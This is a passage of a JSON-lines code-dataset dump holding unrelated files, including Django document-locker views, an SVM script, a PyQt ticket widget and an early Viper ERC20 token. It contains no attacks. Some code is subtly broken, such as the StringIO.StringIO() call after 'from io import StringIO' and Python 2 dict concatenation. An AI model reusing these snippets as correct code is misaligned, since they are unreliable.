'ACTCAGACGGTACCTTTGCG'],\n }\n \n def setUp(self):\n self.nex = NexusReader(os.path.join(EXAMPLE_DIR, 'maddison_et_al.nex'))\n \n def test_taxa(self):\n assert 'taxa' in self.nex.blocks\n for taxon in self.expected:\n assert taxon in self.nex.blocks['taxa'].taxa\n assert self.nex.blocks['taxa'].ntaxa == len(self.expected)\n \n def test_characters(self):\n assert 'characters' in self.nex.blocks\n assert self.nex.blocks['characters'].nchar == 20\n assert self.nex.blocks['characters'].ntaxa == 4\n assert self.nex.blocks['characters'].format['datatype'] == 'dna'\n for taxon in self.expected:\n assert taxon in self.nex.blocks['characters'].matrix\n assert 
self.nex.blocks['characters'].matrix[taxon] == self.expected[taxon]\n \n def test_data(self): # characters is linked to `data`\n assert self.nex.blocks['data'] == self.nex.blocks['characters']\n \n def test_trees(self):\n assert 'trees' in self.nex.blocks\n assert self.nex.blocks['trees'].ntrees == 1\n","sub_path":"nexus/test/test_maddison.py","file_name":"test_maddison.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236582185","text":"#!/usr/bin/env python\nDESC = \"\"\"\nJSON-pretty-printer: \nConverts (raw) json data on stdin and outputs pretty formatted json to stdout\n\"\"\"\n\nimport sys\nimport json\nimport argparse\n\ndef json_pprint(unformated_json, amount_of_indentation):\n \"\"\" Turns raw json into formated json \"\"\"\n parsed = json.loads(unformated_json)\n output = json.dumps(parsed, indent=amount_of_indentation, sort_keys=True)\n return output\n\ndef parse_arguments():\n \"\"\" Parses terminal arguments or returns default values \"\"\"\n arg_obj = argparse.ArgumentParser(description=DESC)\n arg_obj.add_argument( '--indent',\n dest=\"indent\", \n type=int,\n nargs='?',\n default=4,\n help='Notes the amount of spaces each indentation level should have')\n return arg_obj.parse_args()\n\ndef main():\n \"\"\" main function\n Read and parse the given arguments.\n Read the input.\n transform the json\n print the reformated json\n \"\"\"\n arguments = parse_arguments()\n data = \"\"\n for line in sys.stdin:\n data += line\n transformed = json_pprint(data, arguments.indent)\n print(transformed)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"json_pprint.py","file_name":"json_pprint.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"426798963","text":"import os, subprocess, re, string, sys, django, json, uuid, base64\nimport urllib, requests, datetime, shutil\nfrom io import StringIO\n\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.conf import settings\nfrom mylocker.common import get_emplid, get_sunetid, get_display_name, \\\n get_provider,get_extemail\nfrom django.contrib import messages\nfrom locker.models import BackendProvider, LockerEntry, LockerUser, \\\n DocumentSigningProvider\nfrom django.core.mail import EmailMessage\n\nEMAIL_SUBJECT = 'Stanford University Electronic Credential'\nEMAIL_BODY = 'Dear {Recipient\\'s name},\\n\\\n\\n\\\nYou are receiving this certified electronic credential from the Stanford University Registrar\\'s Office on behalf of {users_name}. This electronic document is a certified PDF and is best viewed and validated using the free Adobe Reader (v8.0 or greater). 
To download the free Adobe Reader, please go here: https://get.adobe.com/reader/\\n\\\n\\n\\\nView the second page of the electronic credential for further instructions on how to validate the authenticity of the document.\\n\\\n\\n\\\nBest Regards,\\n\\\n{users_name}'\n\ndef index(request):\n # SCPD users have XNUMBERS, Stanford users have EMPLIDs.\n # We must issue different queries for these two groups.\n if get_extemail(request) :\n user_email = get_extemail(request)\n LockerUser.objects.get_or_create(sunetid=user_email)\n locker_entries = LockerEntry.objects.filter(owner_email=user_email)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n else:\n if get_provider(request) == 'SCPD':\n user_xnumber = get_emplid(request)\n locker_entries = LockerEntry.objects.filter(owner_xnumber=user_xnumber)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n else:\n user_emplid = get_emplid(request)\n LockerUser.objects.get_or_create(sunetid=get_sunetid(request))\n locker_entries = LockerEntry.objects.filter(owner_emplid=user_emplid)\\\n .prefetch_related('backend_entity__lockerentrysenddocs_set').all()\n context = {\n 'locker_entries': locker_entries,\n 'email_subject': EMAIL_SUBJECT,\n 'email_body': preprocess_email_body(request),\n }\n return render(request, 'locker/index.html', context)\n\ndef retrieve_signed_pdf_bytes(locker_entry):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n backend_resp = requests.get(\n \"https://www.box.com/api/2.0/files/\" + locker_entry.backend_entity.entity_id + \"/content\",\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB, headers=BOX_AUTH_HEADERS, stream=True)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception(\"Backend response status code is not 200; value is: \" \\\n + backend_resp.status_code)\n pdf_raw_bytes = backend_resp.raw.data[:]\n if not locker_entry.backend_entity.is_signed:\n # Sign document with Adobe EchoSign.\n backend_resp = sign_document_with_echosign(pdf_raw_bytes)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception('EchoSign response status code is ' + str(backend_resp.status_code))\n pdf_raw_bytes = backend_resp.raw.data\n # Overwrite the backend file with its signed equivalent.\n replace_resp = replace_backend_document(locker_entry.backend_entity.entity_id, pdf_raw_bytes)\n if replace_resp.status_code != requests.codes.created:\n raise Exception('Box replacement response status code is ' + str(replace_resp.status_code))\n # Mark the entity as signed so we don't have to do this again.\n locker_entry.backend_entity.is_signed = True;\n locker_entry.backend_entity.save()\n return pdf_raw_bytes\n\ndef replace_backend_document(entity_id, pdf_raw_bytes):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n return requests.post('https://upload.box.com/api/2.0/files/' + entity_id + '/content',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=BOX_AUTH_HEADERS,\n files={'file' : pdf_raw_bytes})\n\ndef sign_document_with_echosign(pdf_raw_bytes):\n ECHOSIGN_AUTH_HEADERS = {'Access-Token': DocumentSigningProvider.objects.get().access_token}\n uuid4 = str(uuid.uuid4())\n\n # POST the document as a transient document to EchoSign. 
We don't care about\n # the filename, so simply give it a UUID4.\n es_upload_resp = requests.post('https://api.na1.echosign.com/api/rest/v5/transientDocuments',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS,\n files={'File': pdf_raw_bytes, 'Mime-Type': 'application/pdf', 'File-Name': uuid4 + '.pdf'})\n transient_doc_id = es_upload_resp.json()['transientDocumentId']\n\n # Create an agreement using the transient document.\n es_agmt_create_resp = requests.post('https://api.na1.echosign.com:443/api/rest/v5/agreements',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=dict(ECHOSIGN_AUTH_HEADERS.items() + {'Content-Type': 'application/json'}.items()),\n data='{\"documentCreationInfo\":{\"signatureType\":\"ESIGN\",\"recipientSetInfos\":[{\"recipientSetMemberInfos\":[{\"email\":\"locker@stanford.edu\"}],\"recipientSetRole\":\"APPROVER\"}],\"signatureFlow\":\"SENDER_SIGNATURE_NOT_REQUIRED\",\"fileInfos\":[{\"transientDocumentId\":\"'+transient_doc_id+'\"}],\"name\":\"MyLocker_'+uuid4+'\"}}')\n agreement_id = es_agmt_create_resp.json()['agreementId']\n\n # Get the document ID as it pertains to the agreement.\n es_agmt_docs_resp = requests.get('https://api.na1.echosign.com:443/api/rest/v5/agreements/' \\\n + agreement_id + '/documents',\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS)\n agmt_doc_id = es_agmt_docs_resp.json()['documents'][0]['documentId']\n\n # Get the document in the agreement, which is now signed by Adobe.\n es_doc_resp = requests.get('https://api.na1.echosign.com:443/api/rest/v5/agreements/' \\\n + agreement_id + '/documents/' + agmt_doc_id,\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB,\n headers=ECHOSIGN_AUTH_HEADERS, stream=True)\n return es_doc_resp\n\ndef download_old(request, entry_id):\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n locker_entry.create_download_audit_record(request)\n try:\n pdf_raw_bytes = retrieve_signed_pdf_bytes(locker_entry)\n response = HttpResponse(pdf_raw_bytes, content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"' + locker_entry.label_line1 + '.pdf\"'\n return response\n except Exception as ex:\n messages.error(request, 'An unexpected error occurred while retrieving your document: ' + str(ex))\n return redirect(reverse('locker:index'))\n\ndef retrieve_pdf_from_box(backend_entity_id):\n BOX_AUTH_HEADERS = {\n 'Authorization': 'Bearer ' \\\n + BackendProvider.objects.get().access_token\n }\n return requests.get(\n \"https://www.box.com/api/2.0/files/\" + backend_entity_id + \"/content\",\n proxies=settings.STF_PROXY_MAP_REQUESTS_LIB, headers=BOX_AUTH_HEADERS, stream=True)\n\ndef download(request, entry_id):\n if get_extemail(request) :\n locker_entry = get_object_or_404(LockerEntry, owner_email=get_extemail(request), id=entry_id)\n else:\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n locker_entry.create_download_audit_record(request)\n try:\n backend_resp = retrieve_pdf_from_box(locker_entry.backend_entity.entity_id)\n if backend_resp.status_code != requests.codes.ok:\n raise Exception(\"Backend response status code is not 200; value is: \" \\\n + 
backend_resp.status_code)\n except Exception as ex:\n messages.error(request, 'An unexpected error prevented the download of your document.')\n return redirect(reverse('locker:index'))\n\n response = HttpResponse(\n backend_resp, content_type='application/pdf')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"' + locker_entry.label_line1 \\\n + '.pdf\"'\n return response\n\ndef send_document_old(request):\n if request.method == 'POST':\n entry_id=request.POST['entry_id'] \n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n try:\n pdf_raw_bytes = retrieve_signed_pdf_bytes(locker_entry)\n\n # Prepare the email to be sent.\n subject = EMAIL_SUBJECT\n recipient_name=request.POST['recipient_name']\n to_email_addrs=request.POST['to_email_addrs']\n from_email = 'registrar@stanford.edu'\n body = preprocess_email_body(request, recipient_name)\n\n # Create message, attach document, and create audit record.\n email_msg = EmailMessage(subject, body, from_email, to_email_addrs.split(','))\n email_msg.attach(locker_entry.label_line1 + '.pdf', pdf_raw_bytes, 'application/pdf')\n locker_entry.create_send_audit_record(request, subject, body, from_email, to_email_addrs)\n\n # Send the message.\n email_msg.send(fail_silently=False)\n \n messages.success(request, 'Document sent successfully.')\n except Exception as e:\n messages.error(request, 'An error prevented your document from being sent.')\n else:\n messages.error(request, 'You must POST the appropriate data to this route; GET is not supported.')\n return redirect(reverse('locker:index'))\n \ndef send_document(request):\n if request.method == 'POST':\n entry_id=request.POST['entry_id'] \n if get_extemail(request) :\n locker_entry = get_object_or_404(LockerEntry, owner_email=get_extemail(request), id=entry_id)\n else:\n if get_provider(request) == 'SCPD':\n locker_entry = get_object_or_404(LockerEntry, owner_xnumber=get_emplid(request), id=entry_id)\n else:\n locker_entry = get_object_or_404(LockerEntry, owner_emplid=get_emplid(request), id=entry_id)\n try:\n # Get the raw PDF from the response from Box.\n backend_resp = retrieve_pdf_from_box(locker_entry.backend_entity.entity_id)\n pdf_raw_data = StringIO.StringIO()\n shutil.copyfileobj(backend_resp.raw, pdf_raw_data)\n\n # Prepare the email to be sent.\n subject = EMAIL_SUBJECT\n recipient_name=request.POST['recipient_name']\n to_email_addrs=request.POST['to_email_addrs']\n from_email = 'registrar@stanford.edu'\n body = preprocess_email_body(request, recipient_name)\n\n # Create message, attach document, and create audit record.\n email_msg = EmailMessage(subject, body, from_email, to_email_addrs.split(','))\n email_msg.attach(locker_entry.label_line1 + '.pdf', pdf_raw_data.getvalue(), 'application/pdf')\n locker_entry.create_send_audit_record(request, subject, body, from_email, to_email_addrs)\n\n # Send the message.\n email_msg.send(fail_silently=False)\n \n messages.success(request, 'Document sent successfully.')\n except Exception as e:\n messages.error(request, 'An error prevented your document from being sent.')\n else:\n messages.error(request, 'You must POST the appropriate data to this route; GET is not supported.')\n return redirect(reverse('locker:index'))\n\ndef preprocess_email_body(request, recipient_name='{Recipient\\'s name}'):\n return EMAIL_BODY\\\n .replace('{users_name}', 
get_display_name(request))\\\n .replace('{Recipient\\'s name}', recipient_name)\n","sub_path":"Mylocker-Upgrade-master/mylocker/locker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64822014","text":"import re\n\n\ndef parse(content, template):\n \"\"\"解析配置文件\n :param content: 输入的解析文件\n :param template: 输入的匹配规则\n :return: 要返回的字段列表,以及数据\n \"\"\"\n content = re.sub(\"[\\f\\r\\t\\v]*\", \"\", content)\n # 以!或则#分段,生成数组\n pattern = re.compile('^[!#]', re.M)\n group = re.split(pattern, content)\n\n # 去除包含特殊字符的特定段\n special = ['shutdown']\n\n for l in group[:]:\n for s in special:\n if l.find(s) >= 0:\n group.remove(l)\n continue\n # 定义匹配模式\n tu1 = {\n '1': r'\\\\w+', # 数字字母下划线\n '2': \"[0-9a-zA-z/.:]+\", # 数字,字母斜杠.\n '3': \"[0-9a-zA-z-/. =]+\", # 加空格\n '4': \"[0-9]+\", # 数字\n }\n\n # 替换模板并提取内容\n pattern = re.compile(r'{.+?}')\n list1 = re.findall(pattern, template)\n new_list = []\n for l in list1:\n w = l.replace('{', '')\n w = w.replace('}', '')\n ll = w.split(',')\n if ll.__len__() == 1:\n template = template.replace(l, str(\"(?:\" + ll[0] + \")\"))\n\n continue\n\n if ll[1] in tu1.keys():\n ll[1] = tu1[ll[1]]\n new_list.append(ll)\n nn = list(map(lambda x: x[0], new_list))\n\n for s in new_list:\n template = re.sub(\"{\" + s[0] + \".+?}\", str(\"(\" + s[1] + \")\"), template)\n tem_list = template.split('\\n')\n results = []\n for lis in group:\n result = []\n h = 0\n for tem in tem_list:\n lenth = re.findall(re.compile(r'(\\((?!\\?:).+?\\))'), tem).__len__()\n n = re.findall(tem, lis, re.M)\n if h == 0 and n.__len__() == 0:\n break\n h += 1\n if len(n) == 0 and lenth == 1:\n result.append('')\n elif len(n) == 0 and lenth > 1:\n for i in range(lenth):\n result.append('')\n elif type(n[0]) == tuple:\n li = []\n for i in range(n[0].__len__()):\n li.append([])\n for i in range(n.__len__()):\n for j in range(n[0].__len__()):\n li[j].append(n[i][j])\n li_str = list(map(lambda x: ','.join(list(map(lambda y: str(y), x))), li))\n result.extend(li_str)\n else:\n result.append(','.join(list(map(lambda x: str(x), n))))\n\n if result.__len__() != 0:\n results.append(result)\n\n return nn, results\n","sub_path":"utils/parseUtil.py","file_name":"parseUtil.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"401671812","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ReleaseDefinitionEnvironmentSummary(Model):\n \"\"\"ReleaseDefinitionEnvironmentSummary.\n\n :param id:\n :type id: int\n :param last_releases:\n :type last_releases: list of :class:`ReleaseShallowReference `\n :param name:\n :type name: str\n \"\"\"\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'int'},\n 'last_releases': {'key': 'lastReleases', 'type': '[ReleaseShallowReference]'},\n 'name': {'key': 'name', 'type': 'str'}\n }\n\n def __init__(self, id=None, last_releases=None, name=None):\n super(ReleaseDefinitionEnvironmentSummary, self).__init__()\n self.id = id\n self.last_releases = last_releases\n self.name = name\n","sub_path":"vsts/vsts/release/v4_1/models/release_definition_environment_summary.py","file_name":"release_definition_environment_summary.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"523969675","text":"#imports\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import RFE\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import LinearSVC, SVC\nimport numpy as np\nimport pandas as pd\n\n\n#set the number of feature range and parameter C range\nfeatures_num = [5, 10, 15, 20, 30, 50, 75, 100, 250, 500, 1000, 5000]\nnum_costs = 20\ncost_range = np.logspace(-8, 2, num_costs)\n\n\n#This function performs RFE feature selection along with training Gaussian kernel SVC under 10-fold cross validation for direct data combination\n#finC_x is the common samples of gene expression data in CBE data\n#finC_y is the labels corresponding to finC_x\n#finT_x is the common samples of gene expression data in TCX data\n#finT_y is the labels corresponding to finT_x\n#return is the evaluation of model prediction accuracy\ndef rbf_svc_fs97(finC_x, finC_y, finT_x, finT_y):\n \n K = 10\n kf = KFold(n_splits=K)\n\n best_acc = []\n\n for num in features_num:\n\n print('selected num of features: ', num)\n\n dataC_x_train, dataC_x_test, dataC_y_train, dataC_y_test = train_test_split(finC_x, finC_y, test_size=0.1)\n\n dataT_x_train, dataT_x_test, dataT_y_train, dataT_y_test = train_test_split(finT_x, finT_y, test_size=0.1)\n \n estimator_c = LinearSVC()\n selector_c = RFE(estimator_c, num, step=0.1)\n new_x_c = selector_c.fit_transform(dataC_x_train, np.ravel(dataC_y_train))\n\n estimator_t = LinearSVC()\n selector_t = RFE(estimator_t, num, step=0.1)\n new_x_t = selector_t.fit_transform(dataT_x_train, np.ravel(dataT_y_train))\n\n new_x = pd.concat([pd.DataFrame(new_x_c), pd.DataFrame(new_x_t)], axis = 1)\n\n cv_accur = 0\n cv_sd = 0\n\n accur_total = 0\n accur_list = []\n\n for train_index, test_index in kf.split(new_x):\n data_x_train, data_x_test = new_x.values[train_index], new_x.values[test_index]\n data_y_train, data_y_test = finC_y.values[train_index], finC_y.values[test_index]\n data_y_train = np.ravel(data_y_train)\n data_y_test = np.ravel(data_y_test)\n\n accur = np.zeros(num_costs)\n \n for i in range(num_costs):\n model = SVC(gamma = cost_range[i], kernel = 'rbf')\n 
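An aside on the sweep above: cost_range is fed to SVC's gamma (the RBF kernel width), so the loop tunes kernel width while the C penalty stays at its default. A minimal sketch of sweeping both with scikit-learn's GridSearchCV, reusing the record's imports (illustrative only, not part of the original file):

from sklearn.model_selection import GridSearchCV

# 'C' and 'gamma' are standard SVC hyperparameters; the ranges here are illustrative
param_grid = {'C': np.logspace(-2, 2, 5), 'gamma': np.logspace(-4, 0, 5)}
search = GridSearchCV(SVC(kernel='rbf'), param_grid, cv=10)
# search.fit(new_x, np.ravel(finC_y)) would then select the best (C, gamma) pair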
model.fit(data_x_train, data_y_train)\n pred = model.predict(data_x_test)\n accur[i] = accuracy_score(data_y_test, pred)\n \n accur_total += np.max(accur)\n accur_list.append(np.max(accur))\n \n cv_accur = accur_total/K\n cv_sd = np.std(accur_list)\n\n print('Accuracy = ', cv_accur, 'std = ', cv_sd)\n \n best_acc.append(cv_accur)\n \n return best_acc\n\n","sub_path":"rbf_svc_dir.py","file_name":"rbf_svc_dir.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377847995","text":"#Tuples are a type of data structure or container where we can store different values\n#Tuples are very similar to the lists!\n'''\nTuples are similar to lists, but we can't modify them: we can't add a new item or change an existing item.\nA tuple is totally immutable.\n\n'''\n\ntuples = (1, 2, 3)\n#print(tuples.count(1))\n#print(tuples.index())\n\n#----------------------------------\ncoordinaters = (4, 5)\nprint(coordinaters[0])\n\n#coordinaters[1]=10 # we can't assign a value to a tuple element -->'tuple' object does not support item assignment\nprint(coordinaters[1])\n\n#----------------------\nlsCoordinators = [(4, 5), (6,7), (80, 34)]\n\n#---------------------------------------------\ncoOrdinators = (1, 2, 3)\n'''\nx = coOrdinators[0]\ny = coOrdinators[1]\nz = coOrdinators[2]\nprint(x*y*z)\n'''\n#-------------------------Unpacking in python---------------\nx, y, z = coOrdinators\nprint(x*y*z)\n","sub_path":"PythonBasicCodes/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"408243657","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import QDate, Qt, QTimer, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtGui import QTextCharFormat\nfrom gui import TicketHelper\nfrom gui.TicketHelper import TicketStatus\n\n\nfrom ui.ui_remain_ticket_widget import Ui_remainTicketWidget\nfrom config import userData\nimport logging\nfrom eBus import request\n\n\nclass RemindTicketWidget(QWidget):\n\n\n calendarPageChanged = pyqtSignal(int, int)\n calendarClicked = pyqtSignal(QDate)\n\n def __init__(self, parent = None):\n super(RemindTicketWidget, self).__init__(parent)\n self.ui = Ui_remainTicketWidget()\n self.ui.setupUi(self)\n self.lineId = \"\"\n self.busStartTime = \"\"\n todayDate = QDate.currentDate()\n self.curDate = QDate(todayDate.year(), todayDate.month(), 1)\n self.autoRefreshTimer = None\n self.initSignals()\n self.initUI()\n\n def onSelectedBus(self, lineId : str, busStartTime : str):\n logging.info(\"select bus: %s, time: %s\" % (lineId, busStartTime))\n self.lineId = lineId\n self.busStartTime = busStartTime\n self.checkRemindTicket()\n\n\n\n def initSignals(self):\n self.ui.calendarTicket.currentPageChanged.connect(self.onCalendarPageChanged)\n self.ui.calendarTicket.currentPageChanged.connect(self.calendarPageChanged)\n self.ui.checkAutoRefresh.clicked.connect(self.onCheckAutoRefresh)\n self.ui.calendarTicket.clicked.connect(self.calendarClicked)\n\n\n def initUI(self):\n self.ui.calendarTicket.setSelectedDate(QDate(1990,1,1))\n self.ui.calendarTicket.showToday()\n hasTicketItem = self.ui.tableTicketStatusIndicator.item(0, 0)\n hasTicketItem.setText('有票')\n hasTicketItem.setBackground(TicketStatus.HasTicketText.background())\n hasTicketItem.setForeground(TicketStatus.HasTicketText.foreground())\n noneTicketItem = self.ui.tableTicketStatusIndicator.item(0, 1)\n 
noneTicketItem.setText('无票')\n noneTicketItem.setBackground(TicketStatus.NoneTicketText.background())\n noneTicketItem.setForeground(TicketStatus.NoneTicketText.foreground())\n bookTicketItem = self.ui.tableTicketStatusIndicator.item(0, 2)\n bookTicketItem.setText('已购')\n bookTicketItem.setBackground(TicketStatus.BookedTicketText.background())\n bookTicketItem.setForeground(TicketStatus.BookedTicketText.foreground())\n\n def setCurrentPage(self, year : int, month : int):\n self.ui.calendarTicket.setCurrentPage(year, month)\n\n\n\n def onCalendarPageChanged(self, year : int, month : int):\n logging.info(\"calendar page change year:%s, month:%s\" % (year, month))\n self.curDate.setDate(year, month, 1)\n self.checkRemindTicket()\n\n\n def checkRemindTicket(self):\n startDate = QDate(self.curDate.year(), self.curDate.month(), 1)\n remindTicketNumber, ticketPriceList = TicketHelper.getRemindTicketInfo(self.lineId,\n self.busStartTime, self.curDate.year(), self.curDate.month())\n if remindTicketNumber is None:\n return\n logging.info(\"Check remind ticket lists:\" + str(remindTicketNumber))\n logging.info(\"Check ticket price:\" + str(ticketPriceList))\n self.updateCalendarTicketStatus(startDate, remindTicketNumber, ticketPriceList)\n\n\n def updateCalendarTicketStatus(self, startDate : QDate, remindTicketList : list, ticketPrice : list):\n if startDate.isValid() == False or len(remindTicketList) == 0:\n return\n # clear all date format\n self.ui.calendarTicket.setDateTextFormat(QDate(), QTextCharFormat())\n\n for i, remindTicket in enumerate(remindTicketList):\n textFormat = QTextCharFormat()\n if ticketPrice[i] == -2:\n # already booked\n textFormat = TicketStatus.BookedTicketText\n elif ticketPrice[i] != -1:\n if remindTicket > 0:\n textFormat = TicketStatus.HasTicketText\n else:\n textFormat = TicketStatus.NoneTicketText\n self.ui.calendarTicket.setDateTextFormat(startDate, textFormat)\n startDate.setDate(startDate.year(), startDate.month(), startDate.day() + 1)\n\n def onCheckAutoRefresh(self, checked : bool):\n if checked:\n if self.autoRefreshTimer is None:\n self.autoRefreshTimer = QTimer(self)\n self.autoRefreshTimer.timeout.connect(self.onAutoRefreshTimeout)\n timeIntervalSt = self.ui.textRefreshInterval.text()\n if timeIntervalSt == \"\":\n QMessageBox.critical(self, \"Error\",'Please input time interval')\n self.ui.checkAutoRefresh.setChecked(False)\n return\n timeInterval = int(timeIntervalSt) * 1000\n self.autoRefreshTimer.setInterval(timeInterval)\n self.autoRefreshTimer.start(timeInterval)\n else:\n if not self.autoRefreshTimer is None and self.autoRefreshTimer.isActive():\n self.autoRefreshTimer.stop()\n self.ui.textRefreshInterval.setEnabled(not checked)\n\n\n def onAutoRefreshTimeout(self):\n self.checkRemindTicket()\n\n\n\n\n\n","sub_path":"gui/RemainTicketWidget.py","file_name":"RemainTicketWidget.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389787191","text":"# Solidity-Compatible ERC20 Token\n# Implements https://github.com/ethereum/EIPs/issues/20\n# Author: Phil Daian\n\n# The use of the num256 datatype as in this token is not\n# recommended, as it can pose security risks.\n\n# Events are not yet supported in Viper, so events are NOT\n# included in this token. 
This makes this token incompatible\n# with some log-only clients.\n\n# This token is intended as a proof of concept towards\n# language interoperability and not for production use.\n\n# To maintain compatibility with both Solidity tokens and the\n# existing ERC20 specification, this contract will throw\n# only when a non-payable function is attempted to be called\n# with some value; otherwise (on conditions like overflow),\n# false will be returned.\n\nbalances: num256[address]\nallowances: (num256[address])[address]\nnum_issued: num256\n\n# Utility functions for overflow checking\n@constant\ndef is_overflow_add(a : num256, b : num256) -> bool:\n result = num256_add(a, b)\n return num256_lt(result, a)\n\n@constant\ndef is_overflow_sub(a : num256, b : num256) -> bool:\n return num256_lt(a, b)\n\n@payable\ndef deposit():\n _value = msg.value\n _sender = msg.sender\n assert not self.is_overflow_add(self.balances[_sender], as_num256(_value))\n assert not self.is_overflow_add(self.num_issued, as_num256(_value))\n self.balances[_sender] = num256_add(self.balances[_sender], as_num256(_value))\n self.num_issued = num256_add(self.num_issued, as_num256(_value))\n # Fire deposit event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(0), as_bytes32(_sender)], byte_value)\n\ndef withdraw(_value : num256) -> bool:\n _sender = msg.sender\n # Make sure sufficient funds are present, op will not underflow supply\n assert not self.is_overflow_sub(self.balances[_sender], _value)\n assert not self.is_overflow_sub(self.num_issued, _value)\n self.balances[_sender] = num256_sub(self.balances[_sender], _value)\n self.num_issued = num256_sub(self.num_issued, _value)\n send(_sender, as_wei_value(as_num128(_value), wei))\n # Fire withdraw event as transfer to 0x0\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_sender), as_bytes32(0)], byte_value)\n return true\n\n@constant\ndef totalSupply() -> num256:\n return self.num_issued\n\n@constant\ndef balanceOf(_owner : address) -> num256:\n return self.balances[_owner]\n\ndef transfer(_to : address, _value : num256) -> bool:\n _sender = msg.sender\n assert not self.is_overflow_add(self.balances[_to], _value)\n assert not self.is_overflow_sub(self.balances[_sender], _value)\n self.balances[_sender] = num256_sub(self.balances[_sender], _value)\n self.balances[_to] = num256_add(self.balances[_to], _value)\n # Fire transfer event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_sender), as_bytes32(_to)], byte_value)\n return true\n\ndef transferFrom(_from : address, _to : address, _value : num256) -> bool:\n _sender = msg.sender\n allowance = self.allowances[_from][_sender]\n assert not self.is_overflow_add(self.balances[_to], _value)\n assert not self.is_overflow_sub(self.balances[_from], _value)\n assert not self.is_overflow_sub(allowance, _value)\n self.balances[_from] = num256_sub(self.balances[_from], _value)\n self.balances[_to] = num256_add(self.balances[_to], _value)\n self.allowances[_from][_sender] = num256_sub(allowance, _value)\n # Fire transfer event\n byte_value = concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Transfer(address,address,uint256)\"), as_bytes32(_from), as_bytes32(_to)], byte_value)\n return true\n\ndef approve(_spender : address, _value : num256) -> bool:\n self.allowances[msg.sender][_spender] = _value\n byte_value = 
